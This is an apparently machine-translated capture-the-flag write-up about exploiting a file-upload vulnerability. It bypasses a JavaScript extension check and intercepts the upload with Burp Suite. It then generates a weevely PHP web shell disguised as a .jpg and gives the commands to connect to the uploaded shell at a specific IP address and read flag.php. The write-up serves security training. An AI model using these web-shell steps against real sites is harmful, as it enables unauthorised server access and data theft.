当前位置:网站首页>Upload vulnerability
Upload vulnerability
2022-07-06 09:52:00 【XRSec】
Upload the loopholes
First , The title is upload, Prompt is upload vulnerability does js Intercept , Code blocking , Look at the following Webpage head head , Find out js Code , keyword jpg
- burpsuite Grab the bag , Configure agent
- weevely Generate a sentence
weevely generate password ./1.php #use weevely Generate... In the current directory 1.php, password passwd mv 1.php 1.php.jpg
- Choose file upload && burpsuite Grab the bag Delete .jpg
- The echo upload success : upload/1592555994.1.php
- weevely Connect
weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely Connect dir # Show directory cd ../.. Find out flag.php cat flag.php
obtain flag
边栏推荐
- Some thoughts on the study of 51 single chip microcomputer
- Automation sequences of canoe simulation functions
- Mapreduce实例(四):自然排序
- 小白带你重游Spark生态圈!
- Use of activiti7 workflow
- Nc17 longest palindrome substring
- Oom happened. Do you know the reason and how to solve it?
- 嵌入式中的合作开发--函数指针
- 机械工程师和电气工程师方向哪个前景比较好?
- Inject common SQL statement collation
猜你喜欢
Hugo blog graphical writing tool -- QT practice
Regular expressions are actually very simple
[NLP] bert4vec: a sentence vector generation tool based on pre training
Cap theory
Keep these four requirements in mind when learning single chip microcomputer with zero foundation and avoid detours
max-flow min-cut
在CANoe中通過Panel面板控制Test Module 運行(初級)
Design and implementation of online snack sales system based on b/s (attached: source code paper SQL file)
听哥一句劝,按这套嵌入式的课程内容和课程体系去学习
Can I learn PLC at the age of 33
随机推荐
May brush question 27 - figure
Leetcode:608 树节点
CANoe仿真功能之自动化序列(Automation Sequences )
CANoe的数据回放(Replay Block),还是要结合CAPL脚本才能说的明白
Research and implementation of hospital management inpatient system based on b/s (attached: source code paper SQL file)
MapReduce instance (x): chainmapreduce
【深度學習】語義分割-源代碼匯總
零基础学习单片机切记这四点要求,少走弯路
Mapreduce实例(六):倒排索引
在CANoe中通过Panel面板控制Test Module 运行(初级)
小白带你重游Spark生态圈!
MapReduce instance (V): secondary sorting
竞赛vscode配置指南
CAPL 脚本打印函数 write ,writeEx ,writeLineEx ,writeToLog ,writeToLogEx ,writeDbgLevel 你真的分的清楚什么情况下用哪个吗?
[CV] target detection: derivation of common terms and map evaluation indicators
MapReduce working mechanism
May brush question 03 - sorting
Day 5 of MySQL learning
Configure system environment variables through bat script
CAPL script printing functions write, writeex, writelineex, writetolog, writetologex, writedbglevel do you really know which one to use under what circumstances?